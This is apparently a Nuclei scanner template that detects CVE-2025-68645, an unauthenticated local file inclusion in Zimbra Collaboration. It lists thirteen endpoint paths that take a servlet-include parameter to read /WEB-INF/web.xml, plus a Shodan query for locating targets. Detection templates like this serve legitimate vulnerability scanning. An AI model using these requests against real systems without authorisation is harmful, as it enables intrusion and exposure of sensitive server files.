Zimbra Collaboration - Local File Inclusion

id: CVE-2025-68645

info:
  name: Zimbra Collaboration - Local File Inclusion
  author: DhiyaneshDk,sirifu4k1
  severity: high
  description: |
    Zimbra Collaboration (ZCS) 10.0 and 10.1 contain a local file inclusion caused by improper handling of user-supplied parameters in the RestFilter servlet, letting unauthenticated remote attackers include arbitrary files from WebRoot, exploit requires crafted requests to /h/rest endpoint.
  impact: |
    Unauthenticated remote attackers can include arbitrary files from the WebRoot directory, potentially exposing sensitive information.
  remediation: |
    Update to the latest version of Zimbra Collaboration.
  reference:
    - https://x.com/sirifu4k1/status/2006031417088639064
    - https://x.com/sirifu4k1/status/2007279822050078906?s=12&t=ovaWmJElNlGyzadE74ZOgQ
    - https://nvd.nist.gov/vuln/detail/CVE-2025-68645
  metadata:
    max-request: 13
    verified: true
    shodan-query: http.title:"Zimbra Collaboration Suite"
  tags: cve,cve2025,zimbra,zcs,lfi,vkev,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{path}}?javax.servlet.include.servlet_path=/WEB-INF/web.xml"

    payloads:
      path:
        - "h/rest"
        - "h/changepass"
        - "h/imessage"
        - "h/postLoginRedirect"
        - "h/printcalls"
        - "h/printcalendar"
        - "h/printvoicemails"
        - "h/printappointments"
        - "h/printcontacts"
        - "h/printconversations"
        - "h/printmessage"
        - "h/printtasks"
        - "h/viewimages"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<?xml version"
          - "web-app>"
          - "Zimbra"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cc3a8833a17a3a880a448978095712dc5a1fb7c118660cfc092c22e9e332db9c02205e15ac9b15d8f2c7b535f974ea64c501e88b86917ac5f696bcb6f14635630b1d:922c64590222798bb761d5b6d8e72950